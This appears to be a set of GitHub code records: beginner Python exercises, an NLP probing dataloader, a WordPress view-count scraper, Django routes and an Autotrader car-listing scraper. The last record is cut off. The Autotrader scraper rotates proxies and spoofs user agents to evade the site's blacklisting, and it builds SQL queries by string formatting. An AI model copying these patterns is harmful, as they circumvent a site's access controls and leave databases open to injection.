+{"seq_id":"23725817464","text":"continua = str('sim')\nresposta = str('sim')\n\nwhile not resposta != continua:\n fat = 1\n\n n = int(input('Qual o fatorial?: '))\n\n for fatorial in range(1, n + 1):\n fat = fatorial * fat\n\n print(fat)\n resposta = str(input('Deseja continuar?: ').lower())\n\nprint('Programa encerrado a pedido do usuário.')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"livro_algoritmos/fatorail_interativo.py","file_name":"fatorail_interativo.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"17590532778","text":"import flair \nimport torch\nimport numpy as np \nimport spacy\nimport transformers\nimport os, sys, time\nfrom tqdm import tqdm\nimport psutil\nimport pickle\nimport gensim\n\nfrom constants import spacy_pos_dict, spacy_model_names, gensim_fasttext_models\n\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\ndef print_memory_usage(label):\n process = psutil.Process(os.getpid())\n #print(process.memory_info())\n mem = process.memory_info().rss / 1024 / 1024\n print (\"{} using {:.2f} MB memory!\".format(label, mem))\n\nclass DataLoader():\n def __init__(self, split, args):\n self.args = args\n self.pos_tags = spacy_pos_dict[args.lang]\n if args.lm == \"bertmulti\":\n self.emb_dim = 768\n elif args.lm == \"fasttext\":\n self.emb_dim = 100\n else:\n self.emb_dim = -1\n cache_dataset_head = \"cache/{}_{}_{}_{}\".format(args.lang, args.lm, split, args.task)\n if os.path.exists(cache_dataset_head):\n pass\n #print (\"{} exists. Loading the datasets.\".format(cache_dataset_head))\n else:\n print (\"Generating dataset in {}\".format(cache_dataset_head))\n os.makedirs(cache_dataset_head)\n self._generate_data_pairs(split, cache_dataset_head, args)\n filelist_short = os.listdir(cache_dataset_head)\n self.ckpt_filelist = [os.path.join(cache_dataset_head, fn_short) for fn_short in filelist_short]\n self.ckpt_ptr = 0\n # self.x and self.y are loaded from the checkpoint in ckpt_filelist[self.ckpt_ptr]\n self.x = []\n self.y = [] \n self.ptr = 0 # iterates through self.x and self.y\n self.reset()\n\n if split == \"train\":\n self.batch_size = args.batch_size\n else:\n self.batch_size = 1\n\n def _generate_data_pairs(self, split, cache_dataset_head, args):\n \"\"\"\n Return CPU torch tensors\n \"\"\"\n # Corpus\n if args.lang == \"en\": \n corpus = flair.datasets.UD_ENGLISH()\n elif args.lang == \"fr\":\n corpus = flair.datasets.UD_FRENCH()\n elif args.lang == \"es\":\n corpus = flair.datasets.UD_SPANISH()\n else:\n raise ValueError\n if split == \"train\":\n corpus_split = corpus.train \n elif split == \"dev\":\n corpus_split = corpus.dev \n elif split == \"test\":\n corpus_split = corpus.test \n else:\n raise ValueError(\"split {} not accepted!\".format(split))\n\n # SpaCy tagger\n spacy_nlp = spacy.load(spacy_model_names[args.lang])\n\n # Word Embedding (huggingface)\n if args.lm == \"bertmulti\":\n emb_tag = \"bert-base-multilingual-cased\"\n tokenizer = transformers.BertTokenizer.from_pretrained(emb_tag)\n emb = transformers.BertModel.from_pretrained(emb_tag)\n self.emb_dim = emb.config.hidden_size\n elif args.lm == \"fasttext\":\n tokenizer = BaselineTokenizer()\n emb = gensim.models.FastText(gensim_fasttext_models[args.lang])\n self.emb_dim = 100\n elif args.lm == \"glove\":\n raise NotImplementedError\n else:\n raise ValueError(\"lm {} not supported\".format(args.lm))\n\n start_time = time.time()\n dumpcnt = 1\n all_x = []\n all_y = []\n for doc_id, article in enumerate(corpus_split):\n raw_s = article.to_plain_string()\n sent_x, sent_y = self._process_sentence(raw_s, spacy_nlp, tokenizer, emb, args)\n all_x += sent_x\n all_y += sent_y\n if doc_id>0 and doc_id % 1024 == 0:\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n all_x = []\n all_y = []\n dumpcnt += 1\n print (\"Processed {} docs in {:.2f} seconds. 
Cacheing...\".format(doc_id, time.time() - start_time))\n print_memory_usage(f\"docid {doc_id}\")\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n print (\"Finished processing and cached {} docs in {:.2f} seconds.\".format(len(corpus_split), time.time() - start_time))\n\n def _process_dump(self, all_x, all_y, cache_dataset_head, dumpcnt, task):\n all_x_tensors = torch.cat(all_x, dim=0).to(device) # (N, D)\n all_y_tensors = torch.cat(all_y).to(device) # (N,)\n\n if args.task == \"probe\":\n pass \n elif args.task == \"ctarget\":\n rand_y_tensors = torch.LongTensor(np.random.randint(0, len(self.pos_tags), all_y_tensors.shape)).to(device)\n all_y_tensors = rand_y_tensors \n elif args.task == \"crep\":\n all_x_tensors = torch.FloatTensor(np.random.normal(0, 1, all_x_tensors.shape)).to(device)\n else:\n raise ValueError(\"Task {} not accepted!\".format(args.task))\n\n cache_name = os.path.join(cache_dataset_head, f\"{dumpcnt}.pt\")\n with open(cache_name, \"wb+\") as f:\n pickle.dump({\n \"x\": all_x_tensors,\n \"y\": all_y_tensors\n }, f)\n\n return all_x_tensors, all_y_tensors\n\n def _process_sentence(self, raw_s, spacy_nlp, tokenizer, emb, args):\n spacy_tokens = spacy_nlp(raw_s)\n spacy_token_texts = [token.text_with_ws for token in spacy_tokens]\n hf_tokens = tokenizer.tokenize(raw_s)\n clean_hf_tokens = []\n for token in hf_tokens:\n if token.startswith(\"##\"):\n clean_hf_tokens.append(token[2:])\n else:\n clean_hf_tokens.append(token)\n cost, s2h, h2s, s2h_multi, h2s_multi = spacy.gold.align(spacy_token_texts, clean_hf_tokens)\n\n BERT_MAX_LEN = 510\n sent_x = []\n sent_y = []\n\n while len(hf_tokens) > BERT_MAX_LEN:\n hf_tokens_head = hf_tokens[:BERT_MAX_LEN]\n hf_tokens_rem = hf_tokens[BERT_MAX_LEN:]\n h2s_head = h2s[:BERT_MAX_LEN]\n h2s_rem = h2s[BERT_MAX_LEN:]\n h2s_rem = (np.array(h2s_rem) - BERT_MAX_LEN).tolist()\n\n spacy_tokens_head = spacy_tokens[:h2s[BERT_MAX_LEN]]\n spacy_tokens_rem = spacy_tokens[h2s[BERT_MAX_LEN]:]\n s2h_head = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = (np.array(s2h_rem) - h2s[BERT_MAX_LEN]).tolist()\n \n chunk_x, chunk_y = self._align_chunk(hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y \n\n hf_tokens = hf_tokens_rem \n h2s = h2s_rem \n spacy_tokens = spacy_tokens_rem \n s2h = s2h_rem \n chunk_x, chunk_y = self._align_chunk(hf_tokens, h2s, spacy_tokens, s2h, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y\n return sent_x, sent_y \n\n def _align_chunk(self, hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb):\n chunk_x = []\n chunk_y = []\n # Ok now that *_head does not overflow\n # Process the doc and alignments\n if self.args.lm == \"bertmulti\":\n hf_indices_head = tokenizer.encode(hf_tokens_head) # list of int\n vecs, _ = emb(torch.tensor(hf_indices_head).unsqueeze(0))\n # vecs is [1, seq_len, ndim]\n elif self.args.lm == \"fasttext\":\n vecs = torch.tensor(np.array([emb.wv[w] for w in hf_tokens_head])).unsqueeze(0)\n else:\n raise NotImplementedError\n \n # Just traverse the spacy tokenization\n # When there is a miss, find the corresponding miss at hf tokenization\n # Handle the missing parts. 
Then repeat at subseq no-miss at spacy sequence\n i, j = 0, -1\n while i < len(s2h_head):\n if s2h_head[i] > 0:\n j = s2h_head[i]\n x = vecs[:, j] # x is tensor of shape (1, d_emb)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n i += 1\n else:\n start_i, end_i = i, i+1\n while end_i < len(s2h_head) and s2h_head[end_i] < 0:\n end_i += 1\n if end_i == len(s2h_head):\n break\n i = end_i\n if end_i > start_i + 1: # Multiple spacy misses. Skip them\n j = s2h_head[end_i]\n continue \n else: # Only one spacy miss. Find corresponding hf misses\n # Note1: j corresponds to the *previous* value\n # Note2: end_j will at most be len(h2s_head)\n start_j, end_j = j+1, j+2\n while end_j < len(h2s_head) and h2s_head[end_j] < 0:\n end_j += 1\n x = torch.mean(vecs[:, start_j:end_j], dim=1)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n\n return chunk_x, chunk_y \n\n def has_next(self):\n return self.ckpt_ptr < len(self.ckpt_filelist)-1 or self.ptr + self.batch_size <= len(self.x)\n\n def next(self):\n if self.ptr + self.batch_size < len(self.x):\n start = self.ptr \n end = start + self.batch_size \n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end\n elif self.ckpt_ptr < len(self.ckpt_filelist)-1:\n self.ckpt_ptr += 1\n self.x, self.y = self._load_file(self.ckpt_ptr)\n start, end = 0, self.batch_size\n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end \n else:\n return None, None\n return xbatch, ybatch\n\n def _pos_to_label(self, pos_tag):\n if self.args.lang == \"fr\":\n if pos_tag == \"INTJ\":\n pos_tag = \"X\"\n elif pos_tag == \"SYM\":\n pos_tag = \"X\"\n elif self.args.lang == \"es\":\n if pos_tag == \"X\":\n pos_tag = \"INTJ\"\n return torch.LongTensor([self.pos_tags.index(pos_tag)])\n\n def reset(self):\n self.ckpt_ptr = 0\n self.ptr = 0\n self.x, self.y = self._load_file(self.ckpt_ptr)\n\n def _load_file(self, ckpt_ptr):\n with open(self.ckpt_filelist[ckpt_ptr], \"rb\") as f:\n checkpoint = pickle.load(f)\n return checkpoint[\"x\"], checkpoint[\"y\"]\n\n\nclass BaselineTokenizer:\n def __init__(self):\n pass \n\n def tokenize(self, s):\n \"\"\"\n Input: s (a string representation of a sentence)\n Output: tokens (list of string). \n \"\"\"\n return s.split()\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--lm\", type=str, choices=[\"bertmulti\", \"fasttext\", \"glove\"], default=\"bertmulti\")\n parser.add_argument(\"--lang\", type=str, choices=[\"en\", \"es\", \"fr\"], default=\"en\")\n parser.add_argument(\"--task\", type=str, choices=[\"probe\", \"ctarget\", \"crep\"], default=\"probe\")\n\n parser.add_argument(\"--split\", type=str, choices=[\"train\", \"dev\", \"test\"], default=\"dev\")\n parser.add_argument(\"--batch_size\", type=int, default=1)\n args = parser.parse_args()\n \n dl = DataLoader(args.split, args)\n\n print(\"dl.has_next():\", dl.has_next())\n\n print (\"Checking if device is on GPU\")\n x_tensor, y_tensor = dl.next()\n print(\"x_tensor.shape:\", x_tensor.shape)\n print(\"y_tensor.shape:\", y_tensor.shape)\n print(\"x_tensor.device:\", x_tensor.device)\n print(\"y_tensor.device:\", y_tensor.device)\n\n print (\"Checking NaN for this dataset\")\n dl.reset()\n success = True \n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break \n if torch.isnan(x_tensor).sum() > 0:\n print (\"x_tensor has nan entries! 
Stopping!\")\n success = False \n break\n if torch.isnan(y_tensor).sum() > 0:\n print (\"y_tensor has nan entries! Stopping!\")\n success = False \n break\n if success:\n print (\"NaN test passed!\")\n else:\n print (\"NaN test failed!\")\n \n print (\"Compute H(T)\")\n import scipy\n from scipy.stats import entropy\n dl.reset()\n labels = []\n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break\n labels += y_tensor.cpu().numpy().tolist()\n ent = entropy(labels, base=2)\n print (\"H(T)={:.4f}\".format(ent))","repo_name":"SPOClab-ca/InfoProbe","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"39415495281","text":"import os\n\n# Algoritmo para percorrer os arquivos dentro de um caminho de diretórios e localizar um ou mais arquivos a partir do termo procurado.\n\ncaminho_procura = input('Digite um caminho: ')\ntermo_procura = input('Digite um termo: ')\n\n\ndef formata_tamanho(size):\n base = 1024\n kilo = base\n mega = base**2\n giga = base**3\n tera = base**4\n peta = base**5\n\n if size < kilo:\n # na primeira verificação não é necessário manipular o valor de `size`\n texto = 'B'\n elif size < mega:\n size /= kilo\n texto = 'K'\n elif size < giga:\n size /= mega\n texto = 'M'\n elif size < tera:\n size /= giga\n texto = 'G'\n elif size < peta:\n size /= tera\n texto = 'T'\n else:\n size /= peta\n texto = 'P'\n size = round(size, 2)\n return f'{size}{texto}'.replace('.', ',')\n\n\ncontador_de_arquivos = 0\nfor raiz, diretorios, arquivos in os.walk(caminho_procura):\n for arquivo in arquivos:\n if termo_procura in arquivo:\n try:\n contador_de_arquivos += 1\n caminho_completo = os.path.join(raiz, arquivo)\n nome_arquivo, ext_arquivo = os.path.splitext(arquivo)\n tamanho = os.path.getsize(caminho_completo)\n\n print()\n print(f'Encontrei o arquivo: {arquivo}')\n print(f'Caminho: {caminho_completo}')\n print(f'Nome: {nome_arquivo}')\n print(f'Extensão: {ext_arquivo}')\n print(f'Tamanho: {tamanho}')\n print(f'Tamanho formatado: {formata_tamanho(tamanho)}')\n except PermissionError as e:\n print('Sem permissão.')\n except FileNotFoundError as e:\n print('Arquivo não encontrado.')\n except Exception as e:\n print('Erro desconhecido: ', e)\n\nprint()\nprint(f'{contador_de_arquivos} arquivo(s) encontrado(s).')\n\n\n# Quando houver barras invertidas no caminho informado (no caso do Windows) é necessário urilizar o `r` antes da string com o caminho:\n\n# caminho_windows = r'C:\\programs\\anything'\n","repo_name":"renatodev95/curso-python","sub_path":"secao5-modulos-python/os1.py","file_name":"os1.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16091511448","text":"from selenium import webdriver\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom time import sleep\r\nimport datetime\r\nimport gspread\r\nimport json\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport schedule\r\n\r\nmail_username = 'wordpress account mail or username'\r\npassword = 'wordpress account password'\r\nwp_edit = 'https://your URL.dmain/wp-admin/edit.php'\r\n\r\ndate_number = 2\r\ndef check_pv():\r\n scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']\r\n credentials = ServiceAccountCredentials.from_json_keyfile_name('mywp2v-505293b83604.json', scope)\r\n gc = gspread.authorize(credentials)\r\n SPREADSHEET_KEY = '1Rs8Q01HwJdBPLrxme60rBSZm5aUR8pm6CkQNZzZ-r9w'\r\n worksheets = gc.open_by_key(SPREADSHEET_KEY).worksheets()\r\n worksheet = worksheets[0]\r\n worksheet2 = worksheets[1]\r\n\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--headless')\r\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\r\n driver.get(wp_edit)\r\n global mail_username\r\n driver.find_element_by_id('user_login').send_keys(mail_username)\r\n global password\r\n driver.find_element_by_id('user_pass').send_keys(password)\r\n driver.find_element_by_id('wp-submit').click()\r\n global date_number\r\n all_id = driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[1]/div[3]/span[1]').text\r\n all_id = all_id.replace('個の項目','')\r\n title_list = []\r\n id_list = []\r\n pv_list = []\r\n if date_number == 1:\r\n sheet_num = int(all_id) + 1\r\n n = 1\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = driver.find_element_by_xpath(id_path).text\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = pv.replace(' ビュー','')\r\n print(f'タイトル={title}・ID={id}、PV={pv}')\r\n print(f'n={n}・sheet_num={sheet_num}')\r\n worksheet.update_cell(sheet_num,1,title)\r\n #worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n #worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,3,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n worksheet.update_cell(1,3,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 0\r\n sheet_num -= 1\r\n n += 1\r\n sleep(2)\r\n except:\r\n break\r\n\r\n else:\r\n sheet_num = int(all_id) + 1\r\n print(sheet_num)\r\n n = 1\r\n column_number = date_number + 2\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = int(driver.find_element_by_xpath(id_path).text)\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = int(pv.replace(' ビュー',''))\r\n title_list.append(title)\r\n id_list.append(id)\r\n pv_list.append(pv)\r\n title_data = 
worksheet.cell(sheet_num,2).value\r\n if title_data == id:\r\n worksheet.update_cell(sheet_num,column_num,pv)\r\n else:\r\n worksheet.update_cell(sheet_num,1,title)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,column_number,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n column_num = date_number + 2\r\n worksheet.update_cell(1,column_num,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 0 \r\n n += 1\r\n sleep(1)\r\n a = date_number + 1\r\n b = date_number + 2\r\n c = date_number + 1\r\n day1_pv = worksheet.cell(sheet_num,a).value\r\n day1 = worksheet.cell(1,a).value\r\n day2_pv = worksheet.cell(sheet_num,b).value\r\n day2 = worksheet.cell(1,b).value\r\n print(f'aは{a}、bは{b}、cは{c}、sheet_numは{sheet_num}')\r\n print(f'day1={day1_pv}、day2={day2_pv}')\r\n day1_pv = int(day1_pv)\r\n day2_pv = int(day2_pv)\r\n day2_day1 = day2_pv - day1_pv\r\n worksheet2.update_cell(sheet_num, c, day2_day1)\r\n date_data = str(day1)+'~'+str(day2)\r\n worksheet2.update_cell(1, c, date_data)\r\n sheet_num -= 1\r\n sleep(1)\r\n except:\r\n break\r\n\r\n date_number += 1\r\n driver.quit()\r\n\r\ncheck_pv()\r\n#schedule.every().day.at('14:50').do(check_pv)\r\n#schedule.every(3).minutes.do(check_pv)\r\n# while True:\r\n# schedule.run_pending()\r\n# sleep(1)\r\n","repo_name":"Mr-SuperInsane/WP2V","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"75151447208","text":"\nfrom django.conf.urls import url,include\nfrom . import views\nurlpatterns = [\nurl(r'author/', views.authorView.as_view(),name='author'),\nurl(r'authordetail/(?P[0-9]+)',views.authordetail.as_view(),name='authordetail'),\n url(r'bookdetail/(?P[0-9]+)',views.bookdetail.as_view(),name='bookdetail'),\n\nurl(r'',views.Index.as_view(),name='book'),\n\n]\n","repo_name":"krishnapriya-mk/Library-app","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26322609027","text":"import queue\nfrom bs4 import BeautifulSoup\nimport mysql.connector\nimport os\nimport time\nfrom threading import Thread, Lock\nfrom datetime import datetime\nimport logging\nimport requests\nimport argparse\nimport random\nimport re\n\ndef get_q(rng):\n\n\tQ = queue.Queue(1000)\n\tfor page in range(0,max_index*100,100):\n\t\turl = \"https://www.autotrader.ca/cars/?rcp=100&rcs={}&srt=33&pRng={}%2C{}&prx=-1&loc=V3J%203S9&hprc=\\\n\t\t\tTrue&wcp=True&sts=New-Used&inMarket=advancedSearch\\\n\t\t\t\".format(page,price_range[rng][0],price_range[rng][1])\n\t\tQ.put(url)\n\n\treturn Q\n\ndef get_proxies(num, wait):\n\n\tos.system('> proxies.txt')\n\tos.system('timeout '+str(wait)+'s '+'proxybroker find --types HTTPS --lvl High --countries US CA --strict -l '+ str(num) +' > proxies.txt')\n\n\twith open('proxies.txt','r') as proxy_file:\n\t\tproxy_list = proxy_file.readlines()\n\n\treturn proxy_list\n\ndef parse_proxies(proxy_list, protocol):\n\tparsed_list = list();\n\tfor proxy in proxy_list:\n\t\tproxy.strip()\n\t\tindex = proxy.find(']')\n\t\tparsed_list.append(protocol+'://'+proxy[index+2:len(proxy)-2])\n\tprint(parsed_list)\n\treturn parsed_list\n\nclass Crawler(Thread):\n\t#class variables\n\theaders = ['Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n\t\t 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',\n\t\t 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15]']\n\n\tconn = mysql.connector.connect(user=os.environ['USER_NAME'], passwd=os.environ['PASSWORD'], host=os.environ['HOST_NAME'],database=os.environ['DATABASE'])\n\tproxies = None\n\ttimout = None\n\n\tdef __init__(self, outside_proxy, main_Q, worker_Q, timeout):\n\t\tThread.__init__(self)\n\t\t#instance variables\n\t\t#connection/page objects\n\t\tself.req = None\n\t\tself.content = None\n\t\tself.bsObj = None\n\t\tself.path = None\n\t\tself.debug = None\n\t\tself.init_proxies(outside_proxy)\n\t\tself.init_timeout(timeout)\n\t\t#page structures\n\t\tself.bsParse = []\n\t\tself.links = []\n\t\tself.vehicles = []\n\t\t#proxy structures\n\t\tself.main_Q = main_Q\n\t\tself.worker_Q = worker_Q\n\n\tdef gather_links(self):\n\n\t\tself.bsParse = self.bsObj.findAll('div', {'class':'listing-details organic'})\n\t\tfor tag in self.bsParse:\n\t\t\tif 'href' in tag.a.attrs: self.links.append('https://www.autotrader.ca'+ tag.a.attrs['href'])\n\n\tdef init_timeout(self, timeout):\n\t\tCrawler.timeout = timeout\n\n\tdef init_proxies(self, outside_proxy):\n\t\tCrawler.proxies = outside_proxy\n\n\tdef update_request(self,link):\n\n\t\tself.req = None\n\t\twhile str(self.req) != 
'':\n\n\t\t\ttime.sleep(Crawler.timeout)\n\t\t\ttry:\n\t\t\t\tproxy = random.choice(Crawler.proxies)\n\t\t\t\tself.req = requests.get(link,headers={'user-agent':random.choice(self.headers)}, proxies={'https':proxy}, timeout=10)\n\n\t\t\texcept (requests.exceptions.Timeout, requests.exceptions.ConnectTimeout):\n\t\t\t\tprint(\"{} connection timeout using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\texcept requests.exceptions.RequestException:\n\t\t\t\tprint(\"{} other connection issue using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\telse:\n\t\t\t\tself.content = self.req.content\n\t\t\t\tself.bsObj = BeautifulSoup(self.content,'lxml')\n\n\t\t\t\tif len(self.bsObj.findAll('head',attrs={'name':'ROBOTS'}))!=0:\n\t\t\t\t\tprint(\"{} blacklisted ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\t\t\tself.req = None\n\n\t\t\t\tif len(str(self.content)) <= 1000: self.req = None\n\n\tdef check_page_index(self):\n\t\t#get current page\n\t\tself.bsParse = str(self.bsObj.findAll('script',limit=25)[18:25])\n\t\tstart_index = self.bsParse.rfind('\"CurrentPage\":')\n\t\tcurrent_page = self.bsParse[start_index+15:start_index+18]\n\t\t#get max page\n\t\tstart_index = self.bsParse.rfind('\"MaxPage\":')\n\t\tmax_page = self.bsParse[start_index+11:start_index+14]\n\n\t\tif not current_page or not max_page:\n\t\t\tprint('------------------- NO CURRENT OR MAX PAGE -------------------')\n\t\t\tlogging.warning(\"NO CURRENT OR MAX PAGE\")\n\t\t\tprint('--------------------------------------------------------------')\n\t\t\treturn False\n\t\telse:\n\t\t\tif current_page[-1]==',': current_page = current_page[:-1]\n\n\t\tif current_page[0] == '0':\n\t\t\t#Past last page CurrentPage and Lastpage is 0\n\t\t\treturn True\n\t\telif int(current_page) < int(max_page):\n\t\t\tprint(self.path)\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn False\n\t\telse:\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn True\n\n\tdef update_db(self, data):\n\n\t\tcursor = self.conn.cursor()\n\t\tfor row in data:\n\n\t\t\tcur_time = datetime.now()\n\t\t\tformated = cur_time.strftime('%Y-%m-%d %H:%M:%S')\n\t\t\trow['full vehicle'] = row['make']+' '+row['model']+' '+row['year']\n\n\t\t\tvalues = (row['adID'],row['adType'],row['condition'], row['make'], row['model'], row['price'], row['province'],\n\t\t\trow['city'], row['year'], row['kilometres'], row['exterior colour'], row['fuel type'], row['body type'], row['full vehicle'])\n\n\t\t\tsql_autotrader = \"\"\"INSERT INTO main(adID, adType, `condition`, make, model, price, province, city, `year`, kilometers, exterior_color, fuel_type, body_type, full_vehicle)\n\t\t\t\t\t\t\t\tVALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s');\"\"\"%(values)\n\n\t\t\tsql_turnover = \"\"\"INSERT INTO time(adID, time_entered, time_updated)\n\t\t\t\t\t\t\t VALUES('%s','%s',%s)\n\t\t\t\t\t\t\t ON DUPLICATE KEY UPDATE time_updated = '%s';\"\"\"%(row['adID'],formated,'NULL',formated)\n\n\t\t\tsql_vehicle_image = \"\"\"\n\t\t\t\t\t\t\t\tINSERT IGNORE INTO vehicle_image(full_vehicle, image_path) VALUES('%s',NULL);\n\t\t\t\t\t\t\t\t\"\"\"%(row['full vehicle'])\n\n\t\t\tsql_adjusted_price = \"\"\"\n\t\t\t\t\t\t\t\tINSERT INTO price_change(adID, adjusted_price, 
time_updated)\n\t\t\t\t\t\t\t\tVALUES('%s', '%s', '%s')\n\t\t\t\t\t\t\t\tON DUPLICATE KEY UPDATE adjusted_price = '%s', time_updated = '%s';\"\"\"%(row['adID'], row['price'], formated, row['price'], formated)\n\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_autotrader)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\t\t\t\ttry:\n\t\t\t\t\tcursor.execute(sql_adjusted_price)\n\t\t\t\texcept:\n\t\t\t\t\tself.conn.rollback()\n\t\t\telse:\n\t\t\t\tcursor.execute(sql_vehicle_image)\n\t\t\t\tself.conn.commit()\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_turnover)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\n\t\tcursor.close()\n\n\tdef gather_details(self):\n\n\t\tself.vehicles = []\n\n\t\t#TODO: Include error handling for empty links\n\t\tfor link in self.links:\n\n\t\t\tvehicle_details = {'adID':'','adType':'','condition':'','make':'','model':'','price':'','province':'','city':'',\n\t\t\t\t\t'year':'','kilometres':'','exterior colour':'','fuel type':'','body type':''}\n\n\t\t\tself.update_request(link)\n\t\t\t#collect data from gtmManager.initializeDataLayer\n\t\t\tself.bsParse = self.bsObj.findAll('script',limit=3)\n\n\t\t\ttry:\n\t\t\t\tdetails = re.sub('\"','',self.bsParse[2].text)\n\t\t\texcept:\n\t\t\t\tlogging.warning(\"gtmManager.initializeDataLayer method is not available in source for this listing at url: 